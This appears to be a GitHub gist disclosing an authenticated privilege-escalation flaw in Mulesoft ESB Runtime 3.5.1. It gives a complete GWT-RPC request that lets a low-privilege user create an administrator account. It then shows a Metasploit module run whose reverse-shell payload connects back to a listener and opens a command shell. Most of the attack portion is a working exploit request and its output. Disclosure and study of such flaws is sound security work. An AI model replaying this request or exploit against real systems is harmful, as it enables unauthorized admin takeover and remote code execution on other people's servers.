Last active
August 29, 2015 14:08
-
-
Save brandonprry/396aa6eda74a5aaa19ac to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution | |
| Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor. | |
| POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 | |
| Host: 192.168.0.22:8585 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Content-Type: text/x-gwt-rpc; charset=utf-8/ | |
| Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp | |
| Content-Length: 503 | |
| Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; | |
| Connection: keep-alive | |
| Pragma: no-cache | |
| Cache-Control: no-cache | |
| 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|fdsafdsa@fdsafdsa.com|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| | |
| This request will create an administrator with all roles with a username of notadmin and a password of notpassword. Many vectors of remote code execution are available to an administrator. Not only can an administrator deploy WAR applications, they can also evaluate arbitrary groovy scripts via the web interface. | |
| Example run of ExploitHub metasploit module: | |
| msf exploit(mulesoft) > show options | |
| Module options (exploit/linux/http/mulesoft): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| PASSWORD password yes The password for the specified username | |
| Proxies no Use a proxy chain | |
| RHOST 192.168.0.27 yes The target address | |
| RPORT 8585 yes The target port | |
| TARGETURI /mmc-3.5.1/ yes The target URI | |
| USERNAME username yes The username to authenticate as | |
| VHOST no HTTP server virtual host | |
| Payload options (cmd/unix/reverse): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| LHOST 192.168.0.26 yes The listen address | |
| LPORT 4444 yes The listen port | |
| Exploit target: | |
| Id Name | |
| -- ---- | |
| 0 CMD | |
| msf exploit(mulesoft) > exploit | |
| [*] Started reverse double handler | |
| [*] Creating admin user with credentials: vbZYfSEv:sZYGiUmo | |
| [*] Authenticating with new admin user | |
| [*] Popping shell | |
| [*] Accepted the first client connection... | |
| [*] Accepted the second client connection... | |
| [*] Command: echo ySUVlf3iD2Z29lWG; | |
| [*] Writing to socket A | |
| [*] Writing to socket B | |
| [*] Reading from sockets... | |
| [*] Reading from socket A | |
| [*] A: "ySUVlf3iD2Z29lWG\r\n" | |
| [*] Matching... | |
| [*] B is input... | |
| [*] Command shell session 3 opened (192.168.0.26:4444 -> 192.168.0.27:57569) at 2014-10-18 21:27:12 -0700 | |
| id | |
| uid=1000(bperry) gid=1000(bperry) groups=1000(bperry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment